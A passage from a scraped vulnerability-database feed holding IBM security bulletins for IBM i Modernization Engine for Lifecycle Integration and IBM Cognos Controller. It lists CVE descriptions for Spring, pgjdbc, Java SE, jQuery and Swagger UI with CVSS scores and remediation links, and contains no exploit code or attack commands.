https://exchange.xforce.ibmcloud.com/vulnerabilities/217346](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217346>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-26520](<https://vulners.com/cve/CVE-2022-26520>) \n** DESCRIPTION: **** DISPUTED ** In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties. \nCVSS Base score: 0 \nCVSS Vector: \n \n** CVEID: **[CVE-2022-21724](<https://vulners.com/cve/CVE-2022-21724>) \n** DESCRIPTION: **PostgreSQL JDBC Driver (PgJDBC) could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unchecked class instantiation when providing plugin classes. By sending a specially-crafted request using the \"authenticationPluginClassName\", \"sslhostnameverifier\", \"socketFactory\", \"sslfactory\", \"sslpasswordcallback\" classes, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/218798](<https://exchange.xforce.ibmcloud.com/vulnerabilities/218798>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-22968](<https://vulners.com/cve/CVE-2022-22968>) \n** DESCRIPTION: **Spring Framework could provide weaker than expected security, caused by a data binding rules vulnerability in which the patterns for disallowedFields on a DataBinder are case sensitive. The case sensitivity allows that a field is insufficiently protected unless it is listed with both upper and lower case for the first character of the field. An attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/224374](<https://exchange.xforce.ibmcloud.com/vulnerabilities/224374>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22978](<https://vulners.com/cve/CVE-2022-22978>) \n** DESCRIPTION: **Spring Security could allow a remote attacker to bypass security restrictions, caused by a flaw in the RegexRequestMatcher component. By misconfiguring RegexRequestMatcher with `.` in the regular expression, an attacker could exploit this vulnerability to bypass authorization and obtain access. \nCVSS Base score: 8.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/226989](<https://exchange.xforce.ibmcloud.com/vulnerabilities/226989>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** IBM X-Force ID: **221376 \n** DESCRIPTION: **Springfox could allow a remote authenticated attacker to bypass security restrictions, caused by a log injection flaw in io.springfox:springfox-swagger-ui. By sending a specially-crafted request, an attacker could exploit this vulnerability to forge log entries or inject malicious content into the logs. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/221376 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221376>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** IBM X-Force ID: **221508 \n** DESCRIPTION: **Swagger UI could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the OpenAPI definitions. An attacker could exploit this vulnerability using the ?url parameter in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/221508 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/221508>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N) \n \n** IBM X-Force ID: **220313 \n** DESCRIPTION: **PostgreSQL JDBC Driver could allow a remote attacker to gain unauthorized access to the system, caused by the exposure of the connection properties for configuring a pgjdbc connection. By specifying arbitrary connection properties, a remote attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220313 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220313>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM i Modernization Engine for Lifecycle Integration| 1.0 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now.**\n\nProduct(s)| Version(s)| Remediation/Fix/Instructions \n---|---|--- \nIBM i Modernization Engine for Lifecycle Integration| 1.0| Follow [instructions](<https://www.ibm.com/docs/en/merlin/1.0?topic=guide-upgrade-merlin-platform-tools>) to download and install v1.0.1 \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-11T16:00:27", "type": "ibm", "title": "Security Bulletin: IBM i Modernization Engine for Lifecycle Integration is vulnerable to multiple vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-25031", "CVE-2020-36518", "CVE-2020-8908", "CVE-2021-29425", "CVE-2022-1466", "CVE-2022-21724", "CVE-2022-22950", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-22970", "CVE-2022-22976", "CVE-2022-22978", "CVE-2022-26520"], "modified": "2022-07-11T16:00:27", "id": "EBCC12197854D7C444B518B80A223576FCB219A088A0CC929C19FF2993DC431A", "href": "https://www.ibm.com/support/pages/node/6602625", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:45:52", "description": "## Summary\n\nThis Security Bulletin addresses multiple vulnerabilities that have been remediated in IBM Cognos Controller 10.4.2 FP2 and 10.4.1 IF15 . There are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 used by IBM Cognos Controller. The applicable CVEs have been addressed by upgrading to IBM\u00ae Runtime Environment Java\u2122 Version 8 Service Refresh 7 Fix Pack 10. If you run your own Java code using IBM\u00ae Runtime Environment Java\u2122 delivered with this product, you should evaluate your code to determine whether additional Java vulnerabilities are applicable to your code. For a complete list of vulnerabilities, refer to the \"IBM Java SDK Security Bulletin\", located in the References section for more information. There are vulnerabilities in IBM WebSphere Application Server Liberty used by IBM Cognos Controller. The applicable CVEs have been addressed by upgrading to IBM WebSphere Application Server Liberty 22.0.0.6. jQuery is a JavaScript library for HTML DOM tree traversal and manipulation. JQuery has been upgraded to version 3.6.0 in IBM Cognos Controller 10.4.2. jQuery is not used in IBM Cognos Controller 10.4.1 or 10.4.0. IBM Cognos Controller is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Cognos Controller in Server Side Rest APIs. IBM Cognos Controller 10.4.2 FP2 and IBM Cognos Controller 10.4.1 IF15 include Spring 5.3.18. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-22060](<https://vulners.com/cve/CVE-2021-22060>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote authenticated attacker to bypass security restrictions, caused by improper input validation. By sending a specially-crafted request, an attacker could exploit this vulnerability to insert additional log entries. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-39031](<https://vulners.com/cve/CVE-2021-39031>) \n** DESCRIPTION: **IBM WebSphere Application Server - Liberty 17.0.0.3 through 22.0.0.1 could allow a remote authenticated attacker to conduct an LDAP injection. By using a specially crafted request, an attacker could exploit this vulnerability and could result in in granting permission to unauthorized resources. IBM X-Force ID: 213875. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213875](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213875>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35603](<https://vulners.com/cve/CVE-2021-35603>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to obtain sensitive information resulting in a low confidentiality impact using unknown attack vectors. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211676](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211676>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2020-5421](<https://vulners.com/cve/CVE-2020-5421>) \n** DESCRIPTION: **VMware Tanzu Spring Framework could allow a remote attacker to bypass security restrictions, caused by improper input validation. By using a specially-crafted jsessionid path parameter, an attacker could exploit this vulnerability to bypass RFD Protection. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-35560](<https://vulners.com/cve/CVE-2021-35560>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Deployment component could allow an unauthenticated attacker to take control of the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211636](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211636>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-35586](<https://vulners.com/cve/CVE-2021-35586>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211661](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211661>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35578](<https://vulners.com/cve/CVE-2021-35578>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211654>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35564](<https://vulners.com/cve/CVE-2021-35564>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Keytool component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211640](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211640>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-35559](<https://vulners.com/cve/CVE-2021-35559>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Swing component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211635](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211635>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35556](<https://vulners.com/cve/CVE-2021-35556>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Swing component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211632](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211632>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35565](<https://vulners.com/cve/CVE-2021-35565>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the JSSE component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211641](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211641>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-35588](<https://vulners.com/cve/CVE-2021-35588>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 3.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211662](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211662>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2021-41035](<https://vulners.com/cve/CVE-2021-41035>) \n** DESCRIPTION: **Eclipse Openj9 could allow a remote attacker to gain elevated privileges on the system, caused by not throwing IllegalAccessError for MethodHandles that invoke inaccessible interface methods. By persuading a victim to execute a specially-crafted program under a security manager, an attacker could exploit this vulnerability to gain elevated privileges and execute arbitrary code on the system. \nCVSS Base score: 7.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212010](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212010>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-11023](<https://vulners.com/cve/CVE-2020-11023>) \n** DESCRIPTION: **jQuery is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the option elements. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181350](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181350>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-11022](<https://vulners.com/cve/CVE-2020-11022>) \n** DESCRIPTION: **jQuery is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the jQuery.htmlPrefilter method. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/181349](<https://exchange.xforce.ibmcloud.com/vulnerabilities/181349>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2018-25031](<https://vulners.com/cve/CVE-2018-25031>) \n** DESCRIPTION: **swagger-ui could allow a remote attacker to conduct spoofing attacks. By persuading a victim to open a specially-crafted URL, an attacker could exploit this vulnerability to display remote OpenAPI definitions. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217346](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217346>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2021-46708](<https://vulners.com/cve/CVE-2021-46708>) \n** DESCRIPTION: **npm swagger-ui-dist could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217359](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217359>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-35561](<https://vulners.com/cve/CVE-2021-35561>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Utility component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211637](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211637>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2020-7656](<https://vulners.com/cve/CVE-2020-7656>) \n** DESCRIPTION: **jQuery is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the load method. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/182264](<https://exchange.xforce.ibmcloud.com/vulnerabilities/182264>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2022-22475](<https://vulners.com/cve/CVE-2022-22475>) \n** DESCRIPTION: **IBM WebSphere Application Server Liberty and Open Liberty 17.0.0.3 through 22.0.0.5 are vulnerable to identity spoofing by an authenticated user. IBM X-Force ID: 225603. \nCVSS Base score: 7.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/225603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/225603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L) \n \n** CVEID: **[CVE-2021-35517](<https://vulners.com/cve/CVE-2021-35517>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out of memory error when allocating large amounts of memory. By persuading a victim to open a specially-crafted TAR archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' tar package. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205307](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205307>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-36090](<https://vulners.com/cve/CVE-2021-36090>) \n** DESCRIPTION: **Apache Commons Compress is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By reading a specially-crafted ZIP archive, a remote attacker could exploit this vulnerability to cause a denial of service condition against services that use Compress' zip package. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205310](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205310>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-21365](<https://vulners.com/cve/CVE-2022-21365>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217659](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217659>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21360](<https://vulners.com/cve/CVE-2022-21360>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the ImageIO component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217654>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21349](<https://vulners.com/cve/CVE-2022-21349>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the 2D component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217643](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217643>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21341](<https://vulners.com/cve/CVE-2022-21341>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217636](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217636>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21340](<https://vulners.com/cve/CVE-2022-21340>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217635](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217635>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21305](<https://vulners.com/cve/CVE-2022-21305>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217600](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217600>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21294](<https://vulners.com/cve/CVE-2022-21294>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217589](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217589>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21293](<https://vulners.com/cve/CVE-2022-21293>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Libraries component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217588](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217588>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2022-21291](<https://vulners.com/cve/CVE-2022-21291>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the VM component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217586](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217586>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21248](<https://vulners.com/cve/CVE-2022-21248>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2016-1000027](<https://vulners.com/cve/CVE-2016-1000027>) \n** DESCRIPTION: **Pivota Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw in the library. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/174367](<https://exchange.xforce.ibmcloud.com/vulnerabilities/174367>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-9878](<https://vulners.com/cve/CVE-2016-9878>) \n** DESCRIPTION: **Pivotal Spring Framework could allow a remote attacker to traverse directories on the system, caused by the failure to sanitize paths provided to ResourceServlet. An attacker could send a specially-crafted URL request containing directory traversal sequences to view arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/120241](<https://exchange.xforce.ibmcloud.com/vulnerabilities/120241>) for the current score. \nCVSS Vector: 